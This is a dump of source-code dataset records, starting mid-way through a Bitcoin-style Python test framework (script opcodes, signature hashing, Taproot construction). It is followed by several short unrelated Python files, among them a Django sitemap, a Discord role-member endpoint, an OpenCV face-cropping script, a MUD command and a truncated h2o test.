CScriptOp(0x94)\nOP_MUL = CScriptOp(0x95)\nOP_DIV = CScriptOp(0x96)\nOP_MOD = CScriptOp(0x97)\nOP_LSHIFT = CScriptOp(0x98)\nOP_RSHIFT = CScriptOp(0x99)\n\nOP_BOOLAND = CScriptOp(0x9a)\nOP_BOOLOR = CScriptOp(0x9b)\nOP_NUMEQUAL = CScriptOp(0x9c)\nOP_NUMEQUALVERIFY = CScriptOp(0x9d)\nOP_NUMNOTEQUAL = CScriptOp(0x9e)\nOP_LESSTHAN = CScriptOp(0x9f)\nOP_GREATERTHAN = CScriptOp(0xa0)\nOP_LESSTHANOREQUAL = CScriptOp(0xa1)\nOP_GREATERTHANOREQUAL = CScriptOp(0xa2)\nOP_MIN = CScriptOp(0xa3)\nOP_MAX = CScriptOp(0xa4)\n\nOP_WITHIN = CScriptOp(0xa5)\n\n# crypto\nOP_RIPEMD160 = CScriptOp(0xa6)\nOP_SHA1 = CScriptOp(0xa7)\nOP_SHA256 = CScriptOp(0xa8)\nOP_HASH160 = CScriptOp(0xa9)\nOP_HASH256 = CScriptOp(0xaa)\nOP_CODESEPARATOR = CScriptOp(0xab)\nOP_CHECKSIG = CScriptOp(0xac)\nOP_CHECKSIGVERIFY = CScriptOp(0xad)\nOP_CHECKMULTISIG = CScriptOp(0xae)\nOP_CHECKMULTISIGVERIFY = CScriptOp(0xaf)\n\n# expansion\nOP_NOP1 = CScriptOp(0xb0)\nOP_CHECKLOCKTIMEVERIFY = CScriptOp(0xb1)\nOP_CHECKSEQUENCEVERIFY = CScriptOp(0xb2)\nOP_NOP4 = CScriptOp(0xb3)\nOP_NOP5 = CScriptOp(0xb4)\nOP_NOP6 = CScriptOp(0xb5)\nOP_NOP7 = CScriptOp(0xb6)\nOP_NOP8 = CScriptOp(0xb7)\nOP_NOP9 = CScriptOp(0xb8)\nOP_NOP10 = CScriptOp(0xb9)\n\n# BIP 342 opcodes (Tapscript)\nOP_CHECKSIGADD = CScriptOp(0xba)\n\nOP_INVALIDOPCODE = CScriptOp(0xff)\n\nOPCODE_NAMES.update({\n OP_0: 'OP_0',\n OP_PUSHDATA1: 'OP_PUSHDATA1',\n OP_PUSHDATA2: 'OP_PUSHDATA2',\n OP_PUSHDATA4: 'OP_PUSHDATA4',\n OP_1NEGATE: 'OP_1NEGATE',\n OP_RESERVED: 'OP_RESERVED',\n OP_1: 'OP_1',\n OP_2: 'OP_2',\n OP_3: 'OP_3',\n OP_4: 'OP_4',\n OP_5: 'OP_5',\n OP_6: 'OP_6',\n OP_7: 'OP_7',\n OP_8: 'OP_8',\n OP_9: 'OP_9',\n OP_10: 'OP_10',\n OP_11: 'OP_11',\n OP_12: 'OP_12',\n OP_13: 'OP_13',\n OP_14: 'OP_14',\n OP_15: 'OP_15',\n OP_16: 'OP_16',\n OP_NOP: 'OP_NOP',\n OP_VER: 'OP_VER',\n OP_IF: 'OP_IF',\n OP_NOTIF: 'OP_NOTIF',\n OP_VERIF: 'OP_VERIF',\n OP_VERNOTIF: 'OP_VERNOTIF',\n OP_ELSE: 'OP_ELSE',\n OP_ENDIF: 'OP_ENDIF',\n OP_VERIFY: 'OP_VERIFY',\n OP_RETURN: 'OP_RETURN',\n OP_TOALTSTACK: 'OP_TOALTSTACK',\n OP_FROMALTSTACK: 'OP_FROMALTSTACK',\n OP_2DROP: 'OP_2DROP',\n OP_2DUP: 'OP_2DUP',\n OP_3DUP: 'OP_3DUP',\n OP_2OVER: 'OP_2OVER',\n OP_2ROT: 'OP_2ROT',\n OP_2SWAP: 'OP_2SWAP',\n OP_IFDUP: 'OP_IFDUP',\n OP_DEPTH: 'OP_DEPTH',\n OP_DROP: 'OP_DROP',\n OP_DUP: 'OP_DUP',\n OP_NIP: 'OP_NIP',\n OP_OVER: 'OP_OVER',\n OP_PICK: 'OP_PICK',\n OP_ROLL: 'OP_ROLL',\n OP_ROT: 'OP_ROT',\n OP_SWAP: 'OP_SWAP',\n OP_TUCK: 'OP_TUCK',\n OP_CAT: 'OP_CAT',\n OP_SUBSTR: 'OP_SUBSTR',\n OP_LEFT: 'OP_LEFT',\n OP_RIGHT: 'OP_RIGHT',\n OP_SIZE: 'OP_SIZE',\n OP_INVERT: 'OP_INVERT',\n OP_AND: 'OP_AND',\n OP_OR: 'OP_OR',\n OP_XOR: 'OP_XOR',\n OP_EQUAL: 'OP_EQUAL',\n OP_EQUALVERIFY: 'OP_EQUALVERIFY',\n OP_RESERVED1: 'OP_RESERVED1',\n OP_RESERVED2: 'OP_RESERVED2',\n OP_1ADD: 'OP_1ADD',\n OP_1SUB: 'OP_1SUB',\n OP_2MUL: 'OP_2MUL',\n OP_2DIV: 'OP_2DIV',\n OP_NEGATE: 'OP_NEGATE',\n OP_ABS: 'OP_ABS',\n OP_NOT: 'OP_NOT',\n OP_0NOTEQUAL: 'OP_0NOTEQUAL',\n OP_ADD: 'OP_ADD',\n OP_SUB: 'OP_SUB',\n OP_MUL: 'OP_MUL',\n OP_DIV: 'OP_DIV',\n OP_MOD: 'OP_MOD',\n OP_LSHIFT: 'OP_LSHIFT',\n OP_RSHIFT: 'OP_RSHIFT',\n OP_BOOLAND: 'OP_BOOLAND',\n OP_BOOLOR: 'OP_BOOLOR',\n OP_NUMEQUAL: 'OP_NUMEQUAL',\n OP_NUMEQUALVERIFY: 'OP_NUMEQUALVERIFY',\n OP_NUMNOTEQUAL: 'OP_NUMNOTEQUAL',\n OP_LESSTHAN: 'OP_LESSTHAN',\n OP_GREATERTHAN: 'OP_GREATERTHAN',\n OP_LESSTHANOREQUAL: 'OP_LESSTHANOREQUAL',\n OP_GREATERTHANOREQUAL: 'OP_GREATERTHANOREQUAL',\n OP_MIN: 'OP_MIN',\n OP_MAX: 'OP_MAX',\n OP_WITHIN: 'OP_WITHIN',\n OP_RIPEMD160: 'OP_RIPEMD160',\n OP_SHA1: 'OP_SHA1',\n OP_SHA256: 'OP_SHA256',\n OP_HASH160: 'OP_HASH160',\n OP_HASH256: 'OP_HASH256',\n OP_CODESEPARATOR: 'OP_CODESEPARATOR',\n OP_CHECKSIG: 'OP_CHECKSIG',\n OP_CHECKSIGVERIFY: 'OP_CHECKSIGVERIFY',\n OP_CHECKMULTISIG: 'OP_CHECKMULTISIG',\n OP_CHECKMULTISIGVERIFY: 'OP_CHECKMULTISIGVERIFY',\n OP_NOP1: 'OP_NOP1',\n OP_CHECKLOCKTIMEVERIFY: 'OP_CHECKLOCKTIMEVERIFY',\n OP_CHECKSEQUENCEVERIFY: 'OP_CHECKSEQUENCEVERIFY',\n OP_NOP4: 'OP_NOP4',\n OP_NOP5: 'OP_NOP5',\n OP_NOP6: 'OP_NOP6',\n OP_NOP7: 'OP_NOP7',\n OP_NOP8: 'OP_NOP8',\n OP_NOP9: 'OP_NOP9',\n OP_NOP10: 'OP_NOP10',\n OP_CHECKSIGADD: 'OP_CHECKSIGADD',\n OP_INVALIDOPCODE: 'OP_INVALIDOPCODE',\n})\n\nclass CScriptInvalidError(Exception):\n \"\"\"Base class for CScript exceptions\"\"\"\n pass\n\nclass CScriptTruncatedPushDataError(CScriptInvalidError):\n \"\"\"Invalid pushdata due to truncation\"\"\"\n def __init__(self, msg, data):\n self.data = data\n super().__init__(msg)\n\n\n# This is used, eg, for blockchain heights in coinbase scripts (bip34)\nclass CScriptNum:\n __slots__ = (\"value\",)\n\n def __init__(self, d=0):\n self.value = d\n\n @staticmethod\n def encode(obj):\n r = bytearray(0)\n if obj.value == 0:\n return bytes(r)\n neg = obj.value < 0\n absvalue = -obj.value if neg else obj.value\n while (absvalue):\n r.append(absvalue & 0xff)\n absvalue >>= 8\n if r[-1] & 0x80:\n r.append(0x80 if neg else 0)\n elif neg:\n r[-1] |= 0x80\n return bytes([len(r)]) + r\n\n @staticmethod\n def decode(vch):\n result = 0\n # We assume valid push_size and minimal encoding\n value = vch[1:]\n if len(value) == 0:\n return result\n for i, byte in enumerate(value):\n result |= int(byte) << 8 * i\n if value[-1] >= 0x80:\n # Mask for all but the highest result bit\n num_mask = (2**(len(value) * 8) - 1) >> 1\n result &= num_mask\n result *= -1\n return result\n\n\nclass CScript(bytes):\n \"\"\"Serialized script\n\n A bytes subclass, so you can use this directly whenever bytes are accepted.\n Note that this means that indexing does *not* work - you'll get an index by\n byte rather than opcode. This format was chosen for efficiency so that the\n general case would not require creating a lot of little CScriptOP objects.\n\n iter(script) however does iterate by opcode.\n \"\"\"\n __slots__ = ()\n\n @classmethod\n def __coerce_instance(cls, other):\n # Coerce other into bytes\n if isinstance(other, CScriptOp):\n other = bytes([other])\n elif isinstance(other, CScriptNum):\n if (other.value == 0):\n other = bytes([CScriptOp(OP_0)])\n else:\n other = CScriptNum.encode(other)\n elif isinstance(other, int):\n if 0 <= other <= 16:\n other = bytes([CScriptOp.encode_op_n(other)])\n elif other == -1:\n other = bytes([OP_1NEGATE])\n else:\n other = CScriptOp.encode_op_pushdata(bn2vch(other))\n elif isinstance(other, (bytes, bytearray)):\n other = CScriptOp.encode_op_pushdata(other)\n return other\n\n def __add__(self, other):\n # add makes no sense for a CScript()\n raise NotImplementedError\n\n def join(self, iterable):\n # join makes no sense for a CScript()\n raise NotImplementedError\n\n def __new__(cls, value=b''):\n if isinstance(value, bytes) or isinstance(value, bytearray):\n return super().__new__(cls, value)\n else:\n def coerce_iterable(iterable):\n for instance in iterable:\n yield cls.__coerce_instance(instance)\n # Annoyingly on both python2 and python3 bytes.join() always\n # returns a bytes instance even when subclassed.\n return super().__new__(cls, b''.join(coerce_iterable(value)))\n\n def raw_iter(self):\n \"\"\"Raw iteration\n\n Yields tuples of (opcode, data, sop_idx) so that the different possible\n PUSHDATA encodings can be accurately distinguished, as well as\n determining the exact opcode byte indexes. (sop_idx)\n \"\"\"\n i = 0\n while i < len(self):\n sop_idx = i\n opcode = self[i]\n i += 1\n\n if opcode > OP_PUSHDATA4:\n yield (opcode, None, sop_idx)\n else:\n datasize = None\n pushdata_type = None\n if opcode < OP_PUSHDATA1:\n pushdata_type = 'PUSHDATA(%d)' % opcode\n datasize = opcode\n\n elif opcode == OP_PUSHDATA1:\n pushdata_type = 'PUSHDATA1'\n if i >= len(self):\n raise CScriptInvalidError('PUSHDATA1: missing data length')\n datasize = self[i]\n i += 1\n\n elif opcode == OP_PUSHDATA2:\n pushdata_type = 'PUSHDATA2'\n if i + 1 >= len(self):\n raise CScriptInvalidError('PUSHDATA2: missing data length')\n datasize = self[i] + (self[i + 1] << 8)\n i += 2\n\n elif opcode == OP_PUSHDATA4:\n pushdata_type = 'PUSHDATA4'\n if i + 3 >= len(self):\n raise CScriptInvalidError('PUSHDATA4: missing data length')\n datasize = self[i] + (self[i + 1] << 8) + (self[i + 2] << 16) + (self[i + 3] << 24)\n i += 4\n\n else:\n assert False # shouldn't happen\n\n data = bytes(self[i:i + datasize])\n\n # Check for truncation\n if len(data) < datasize:\n raise CScriptTruncatedPushDataError('%s: truncated data' % pushdata_type, data)\n\n i += datasize\n\n yield (opcode, data, sop_idx)\n\n def __iter__(self):\n \"\"\"'Cooked' iteration\n\n Returns either a CScriptOP instance, an integer, or bytes, as\n appropriate.\n\n See raw_iter() if you need to distinguish the different possible\n PUSHDATA encodings.\n \"\"\"\n for (opcode, data, sop_idx) in self.raw_iter():\n if data is not None:\n yield data\n else:\n opcode = CScriptOp(opcode)\n\n if opcode.is_small_int():\n yield opcode.decode_op_n()\n else:\n yield CScriptOp(opcode)\n\n def __repr__(self):\n def _repr(o):\n if isinstance(o, bytes):\n return \"x('%s')\" % o.hex()\n else:\n return repr(o)\n\n ops = []\n i = iter(self)\n while True:\n op = None\n try:\n op = _repr(next(i))\n except CScriptTruncatedPushDataError as err:\n op = '%s...<ERROR: %s>' % (_repr(err.data), err)\n break\n except CScriptInvalidError as err:\n op = '<ERROR: %s>' % err\n break\n except StopIteration:\n break\n finally:\n if op is not None:\n ops.append(op)\n\n return \"CScript([%s])\" % ', '.join(ops)\n\n def GetSigOpCount(self, fAccurate):\n \"\"\"Get the SigOp count.\n\n fAccurate - Accurately count CHECKMULTISIG, see BIP16 for details.\n\n Note that this is consensus-critical.\n \"\"\"\n n = 0\n lastOpcode = OP_INVALIDOPCODE\n for (opcode, data, sop_idx) in self.raw_iter():\n if opcode in (OP_CHECKSIG, OP_CHECKSIGVERIFY):\n n += 1\n elif opcode in (OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY):\n if fAccurate and (OP_1 <= lastOpcode <= OP_16):\n n += opcode.decode_op_n()\n else:\n n += 20\n lastOpcode = opcode\n return n\n\n\nSIGHASH_DEFAULT = 0 # Taproot-only default, semantics same as SIGHASH_ALL\nSIGHASH_ALL = 1\nSIGHASH_NONE = 2\nSIGHASH_SINGLE = 3\nSIGHASH_ANYONECANPAY = 0x80\n\ndef FindAndDelete(script, sig):\n \"\"\"Consensus critical, see FindAndDelete() in Electron codebase\"\"\"\n r = b''\n last_sop_idx = sop_idx = 0\n skip = True\n for (opcode, data, sop_idx) in script.raw_iter():\n if not skip:\n r += script[last_sop_idx:sop_idx]\n last_sop_idx = sop_idx\n if script[sop_idx:sop_idx + len(sig)] == sig:\n skip = True\n else:\n skip = False\n if not skip:\n r += script[last_sop_idx:]\n return CScript(r)\n\ndef LegacySignatureHash(script, txTo, inIdx, hashtype):\n \"\"\"Consensus-correct SignatureHash\n\n Returns (hash, err) to precisely match the consensus-critical behavior of\n the SIGHASH_SINGLE bug. (inIdx is *not* checked for validity)\n \"\"\"\n HASH_ONE = b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\n if inIdx >= len(txTo.vin):\n return (HASH_ONE, \"inIdx %d out of range (%d)\" % (inIdx, len(txTo.vin)))\n txtmp = CTransaction(txTo)\n\n for txin in txtmp.vin:\n txin.scriptSig = b''\n txtmp.vin[inIdx].scriptSig = FindAndDelete(script, CScript([OP_CODESEPARATOR]))\n\n if (hashtype & 0x1f) == SIGHASH_NONE:\n txtmp.vout = []\n\n for i in range(len(txtmp.vin)):\n if i != inIdx:\n txtmp.vin[i].nSequence = 0\n\n elif (hashtype & 0x1f) == SIGHASH_SINGLE:\n outIdx = inIdx\n if outIdx >= len(txtmp.vout):\n return (HASH_ONE, \"outIdx %d out of range (%d)\" % (outIdx, len(txtmp.vout)))\n\n tmp = txtmp.vout[outIdx]\n txtmp.vout = []\n for _ in range(outIdx):\n txtmp.vout.append(CTxOut(-1))\n txtmp.vout.append(tmp)\n\n for i in range(len(txtmp.vin)):\n if i != inIdx:\n txtmp.vin[i].nSequence = 0\n\n if hashtype & SIGHASH_ANYONECANPAY:\n tmp = txtmp.vin[inIdx]\n txtmp.vin = []\n txtmp.vin.append(tmp)\n\n s = txtmp.serialize_without_witness()\n s += struct.pack(b\"<I\", hashtype)\n\n hash = hash256(s)\n\n return (hash, None)\n\n# TODO: Allow cached hashPrevouts/hashSequence/hashOutputs to be provided.\n# Performance optimization probably not necessary for python tests, however.\n# Note that this corresponds to sigversion == 1 in EvalScript, which is used\n# for version 0 witnesses.\ndef SegwitV0SignatureHash(script, txTo, inIdx, hashtype, amount):\n\n hashPrevouts = 0\n hashSequence = 0\n hashOutputs = 0\n\n if not (hashtype & SIGHASH_ANYONECANPAY):\n serialize_prevouts = bytes()\n for i in txTo.vin:\n serialize_prevouts += i.prevout.serialize()\n hashPrevouts = uint256_from_str(hash256(serialize_prevouts))\n\n if (not (hashtype & SIGHASH_ANYONECANPAY) and (hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):\n serialize_sequence = bytes()\n for i in txTo.vin:\n serialize_sequence += struct.pack(\"<I\", i.nSequence)\n hashSequence = uint256_from_str(hash256(serialize_sequence))\n\n if ((hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):\n serialize_outputs = bytes()\n for o in txTo.vout:\n serialize_outputs += o.serialize()\n hashOutputs = uint256_from_str(hash256(serialize_outputs))\n elif ((hashtype & 0x1f) == SIGHASH_SINGLE and inIdx < len(txTo.vout)):\n serialize_outputs = txTo.vout[inIdx].serialize()\n hashOutputs = uint256_from_str(hash256(serialize_outputs))\n\n ss = bytes()\n ss += struct.pack(\"<i\", txTo.nVersion)\n ss += ser_uint256(hashPrevouts)\n ss += ser_uint256(hashSequence)\n ss += txTo.vin[inIdx].prevout.serialize()\n ss += ser_string(script)\n ss += struct.pack(\"<q\", amount)\n ss += struct.pack(\"<I\", txTo.vin[inIdx].nSequence)\n ss += ser_uint256(hashOutputs)\n ss += struct.pack(\"<i\", txTo.nLockTime)\n ss += struct.pack(\"<I\", hashtype)\n\n return hash256(ss)\n\nclass TestFrameworkScript(unittest.TestCase):\n def test_bn2vch(self):\n self.assertEqual(bn2vch(0), bytes([]))\n self.assertEqual(bn2vch(1), bytes([0x01]))\n self.assertEqual(bn2vch(-1), bytes([0x81]))\n self.assertEqual(bn2vch(0x7F), bytes([0x7F]))\n self.assertEqual(bn2vch(-0x7F), bytes([0xFF]))\n self.assertEqual(bn2vch(0x80), bytes([0x80, 0x00]))\n self.assertEqual(bn2vch(-0x80), bytes([0x80, 0x80]))\n self.assertEqual(bn2vch(0xFF), bytes([0xFF, 0x00]))\n self.assertEqual(bn2vch(-0xFF), bytes([0xFF, 0x80]))\n self.assertEqual(bn2vch(0x100), bytes([0x00, 0x01]))\n self.assertEqual(bn2vch(-0x100), bytes([0x00, 0x81]))\n self.assertEqual(bn2vch(0x7FFF), bytes([0xFF, 0x7F]))\n self.assertEqual(bn2vch(-0x8000), bytes([0x00, 0x80, 0x80]))\n self.assertEqual(bn2vch(-0x7FFFFF), bytes([0xFF, 0xFF, 0xFF]))\n self.assertEqual(bn2vch(0x80000000), bytes([0x00, 0x00, 0x00, 0x80, 0x00]))\n self.assertEqual(bn2vch(-0x80000000), bytes([0x00, 0x00, 0x00, 0x80, 0x80]))\n self.assertEqual(bn2vch(0xFFFFFFFF), bytes([0xFF, 0xFF, 0xFF, 0xFF, 0x00]))\n self.assertEqual(bn2vch(123456789), bytes([0x15, 0xCD, 0x5B, 0x07]))\n self.assertEqual(bn2vch(-54321), bytes([0x31, 0xD4, 0x80]))\n\n def test_cscriptnum_encoding(self):\n # round-trip negative and multi-byte CScriptNums\n values = [0, 1, -1, -2, 127, 128, -255, 256, (1 << 15) - 1, -(1 << 16), (1 << 24) - 1, (1 << 31), 1 - (1 << 32), 1 << 40, 1500, -1500]\n for value in values:\n self.assertEqual(CScriptNum.decode(CScriptNum.encode(CScriptNum(value))), value)\n\ndef TaprootSignatureHash(txTo, spent_utxos, hash_type, input_index = 0, scriptpath = False, script = CScript(), codeseparator_pos = -1, annex = None, leaf_ver = LEAF_VERSION_TAPSCRIPT):\n assert (len(txTo.vin) == len(spent_utxos))\n assert (input_index < len(txTo.vin))\n out_type = SIGHASH_ALL if hash_type == 0 else hash_type & 3\n in_type = hash_type & SIGHASH_ANYONECANPAY\n spk = spent_utxos[input_index].scriptPubKey\n ss = bytes([0, hash_type]) # epoch, hash_type\n ss += struct.pack(\"<i\", txTo.nVersion)\n ss += struct.pack(\"<I\", txTo.nLockTime)\n if in_type != SIGHASH_ANYONECANPAY:\n ss += sha256(b\"\".join(i.prevout.serialize() for i in txTo.vin))\n ss += sha256(b\"\".join(struct.pack(\"<q\", u.nValue) for u in spent_utxos))\n ss += sha256(b\"\".join(ser_string(u.scriptPubKey) for u in spent_utxos))\n ss += sha256(b\"\".join(struct.pack(\"<I\", i.nSequence) for i in txTo.vin))\n if out_type == SIGHASH_ALL:\n ss += sha256(b\"\".join(o.serialize() for o in txTo.vout))\n spend_type = 0\n if annex is not None:\n spend_type |= 1\n if (scriptpath):\n spend_type |= 2\n ss += bytes([spend_type])\n if in_type == SIGHASH_ANYONECANPAY:\n ss += txTo.vin[input_index].prevout.serialize()\n ss += struct.pack(\"<q\", spent_utxos[input_index].nValue)\n ss += ser_string(spk)\n ss += struct.pack(\"<I\", txTo.vin[input_index].nSequence)\n else:\n ss += struct.pack(\"<I\", input_index)\n if (spend_type & 1):\n ss += sha256(ser_string(annex))\n if out_type == SIGHASH_SINGLE:\n if input_index < len(txTo.vout):\n ss += sha256(txTo.vout[input_index].serialize())\n else:\n ss += bytes(0 for _ in range(32))\n if (scriptpath):\n ss += TaggedHash(\"TapLeaf\", bytes([leaf_ver]) + ser_string(script))\n ss += bytes([0])\n ss += struct.pack(\"<i\", codeseparator_pos)\n assert len(ss) == 175 - (in_type == SIGHASH_ANYONECANPAY) * 49 - (out_type != SIGHASH_ALL and out_type != SIGHASH_SINGLE) * 32 + (annex is not None) * 32 + scriptpath * 37\n return TaggedHash(\"TapSighash\", ss)\n\ndef taproot_tree_helper(scripts):\n if len(scripts) == 0:\n return ([], bytes(0 for _ in range(32)))\n if len(scripts) == 1:\n # One entry: treat as a leaf\n script = scripts[0]\n assert(not callable(script))\n if isinstance(script, list):\n return taproot_tree_helper(script)\n assert(isinstance(script, tuple))\n version = LEAF_VERSION_TAPSCRIPT\n name = script[0]\n code = script[1]\n if len(script) == 3:\n version = script[2]\n assert version & 1 == 0\n assert isinstance(code, bytes)\n h = TaggedHash(\"TapLeaf\", bytes([version]) + ser_string(code))\n if name is None:\n return ([], h)\n return ([(name, version, code, bytes())], h)\n elif len(scripts) == 2 and callable(scripts[1]):\n # Two entries, and the right one is a function\n left, left_h = taproot_tree_helper(scripts[0:1])\n right_h = scripts[1](left_h)\n left = [(name, version, script, control + right_h) for name, version, script, control in left]\n right = []\n else:\n # Two or more entries: descend into each side\n split_pos = len(scripts) // 2\n left, left_h = taproot_tree_helper(scripts[0:split_pos])\n right, right_h = taproot_tree_helper(scripts[split_pos:])\n left = [(name, version, script, control + right_h) for name, version, script, control in left]\n right = [(name, version, script, control + left_h) for name, version, script, control in right]\n if right_h < left_h:\n right_h, left_h = left_h, right_h\n h = TaggedHash(\"TapBranch\", left_h + right_h)\n return (left + right, h)\n\nTaprootInfo = namedtuple(\"TaprootInfo\", \"scriptPubKey,inner_pubkey,negflag,tweak,leaves\")\nTaprootLeafInfo = namedtuple(\"TaprootLeafInfo\", \"script,version,merklebranch\")\n\ndef taproot_construct(pubkey, scripts=None):\n \"\"\"Construct a tree of Taproot spending conditions\n\n pubkey: an ECPubKey object for the internal pubkey\n scripts: a list of items; each item is either:\n - a (name, CScript) tuple\n - a (name, CScript, leaf version) tuple\n - another list of items (with the same structure)\n - a function, which specifies how to compute the hashing partner\n in function of the hash of whatever it is combined with\n\n Returns: script (sPK or redeemScript), tweak, {name:(script, leaf version, negation flag, innerkey, merklepath), ...}\n \"\"\"\n if scripts is None:\n scripts = []\n\n ret, h = taproot_tree_helper(scripts)\n tweak = TaggedHash(\"TapTweak\", pubkey + h)\n tweaked, negated = tweak_add_pubkey(pubkey, tweak)\n leaves = dict((name, TaprootLeafInfo(script, version, merklebranch)) for name, version, script, merklebranch in ret)\n return TaprootInfo(CScript([OP_1, tweaked]), pubkey, negated + 0, tweak, leaves)\n\ndef is_op_success(o):\n return o == 0x50 or o == 0x62 or o == 0x89 or o == 0x8a or o == 0x8d or o == 0x8e or (o >= 0x7e and o <= 0x81) or (o >= 0x83 and o <= 0x86) or (o >= 0x95 and o <= 0x99) or (o >= 0xbb and o <= 0xfe)\n"} {"ext": "py", "sha": "1a30fffb107d8e9918a26f257e964aec9b855a08", "content": "# num = int(input())\n#\n# if num > 5:\n# print(\">5\")\n#\n# elif num < 5:\n# print(\"<5\")\n#\n# elif num == 5:\n# print(\"=5\")\n#\n# else:\n# print(\"none\")\n#\n# ---------------------------------------\n\nday = input()\nprint(\"Enter number: \")\n\nif day == \"Monday\":\n num1 = float(input())\nelse:\n num2 = float(input())\n\n"} {"ext": "py", "sha": "1a3101290aefac2c3fe498e530eaa3edb98b8225", "content": "from django.contrib.gis.sitemaps import KMLSitemap, KMZSitemap\n\nfrom .models import City, Country\n\nsitemaps = {'kml': KMLSitemap([City, Country]),\n 'kmz': KMZSitemap([City, Country]),\n }\n"} {"ext": "py", "sha": "1a31015e3e28cb3d3542d5909701e2db8a488feb", "content": "from aiohttp import web\nfrom utils.utils import *\n\ndef get_members(request, client):\n try:\n role_ids = request.query[\"ids\"].split(\",\")\n guild = client.get_guild(client.config[\"main_guild_id\"])\n roles = [get(guild.roles, id=int(role_id)) for role_id in role_ids]\n members = [role.members for role in roles]\n except KeyError:\n return web.json_response({\"error\": \"You did not provide the correct query param ids\"})\n except AttributeError:\n return web.json_response({\"error\": \"Invalid Guild ID or Role ID provided\"})\n\n member_data = [\n {\n \"name\": member.name,\n \"id\": member.id,\n \"discriminator\": member.discriminator,\n } for member in [m for m in members][0]\n ]\n\n return web.json_response({\"member_data\": member_data})"} {"ext": "py", "sha": "1a310169466228b42bef45a2100691bcc0b57baa", "content": "\nimport os\nimport cv2\n\ncascPath = \"./haarcascades/haarcascade_frontalface_alt.xml\"\ninput_dir = './lfw'\noutput_dir = './other_faces'\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n# classifiers\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\nindex = 1\nfor (path,dirnames,filenames) in os.walk(input_dir):\n for filename in filenames:\n if filename.endswith('.jpg'):\n print('处理picture %s'%index)\n image = cv2.imread(path + '/' + filename)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\n # Detect faces in the image\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.3,\n minNeighbors=5,\n minSize=(30, 30)\n )\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n \n image = image[y:y+h,x:x+w]\n image = cv2.resize(image,(64,64))\n cv2.imshow('image',image)\n cv2.imwrite(output_dir+'/'+str(index)+'.jpg',image)\n index +=1\n if cv2.waitKey(30) & 0xFF == ord('q'):\n break \ncv2.destroyAllWindows()\n"} {"ext": "py", "sha": "1a3102afdbde15af0544f1b7b4352399787fd819", "content": "#######################\n# Dennis MUD #\n# remake_item.py #\n# Copyright 2018-2020 #\n# Michael D. Reiley #\n#######################\n\n# **********\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n# **********\n\nNAME = \"remake item\"\nCATEGORIES = [\"items\"]\nUSAGE = \"remake item <item_id>\"\nDESCRIPTION = \"\"\"Resets the item <item_id> in your inventory.\n\nName and ID are untouched, you must be the primary owner of the item.\nOwners are reset to the primary owner only. Wizards can remake any item.\n\nEx. `remake item 3`\"\"\"\n\n\ndef COMMAND(console, args):\n # Perform initial checks.\n if not COMMON.check(NAME, console, args, argmin=1, argmax=1):\n return False\n\n # Perform argument type checks and casts.\n itemid = COMMON.check_argtypes(NAME, console, args, checks=[[0, int]], retargs=0)\n if itemid is None:\n return False\n\n # Lookup the target item and perform item checks.\n thisitem = COMMON.check_item(NAME, console, itemid, owner=True, primary=True, holding=True)\n if not thisitem:\n return False\n\n # remake the item.\n if len(thisitem[\"container\"][\"inventory\"])>0:\n console.msg(\"{0} is not empty, please empty it before remaking.\".format(thisitem[\"name\"]))\n return False\n if thisitem[\"duplified\"]:\n console.msg(\"Please unduplify this item before remaking.\")\n return False\n thisitem[\"desc\"] = \"\"\n thisitem[\"action\"] = \"\"\n thisitem[\"message\"] = \"\"\n thisitem[\"mlang\"] = None\n thisitem[\"lang\"] = None\n thisitem[\"owners\"] = [console.user[\"name\"]]\n thisitem[\"glued\"] = console.database.defaults[\"items\"][\"glued\"]\n thisitem[\"hidden\"] = False\n thisitem[\"truehide\"] = False\n thisitem[\"chance\"] = 1\n thisitem[\"container\"][\"enabled\"] = False\n thisitem[\"container\"][\"inventory\"] = []\n thisitem[\"telekey\"] = None\n console.database.upsert_item(thisitem)\n\n # Finished.\n console.msg(\"{0}: Done.\".format(NAME))\n return True\n\n"} {"ext": "py", "sha": "1a3103ac288270399cc51fa60266f9cce7700cd7", "content": "import sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nimport numpy as np\nimport pandas as pd\n\ndef to_H2OFrame():\n\n # TODO: negative testing\n\n ## 1. list\n # a. single col\n python_obj = [1, \"a\", 2.5, \"bcd\", 0]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n\n # b. 1 col, 5 rows\n python_obj = [[1], [2], [3.7], [8], [9]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. 5 cols, 3 rows\n python_obj = [[6,7,8,9,10], [1,2,3,4,5], 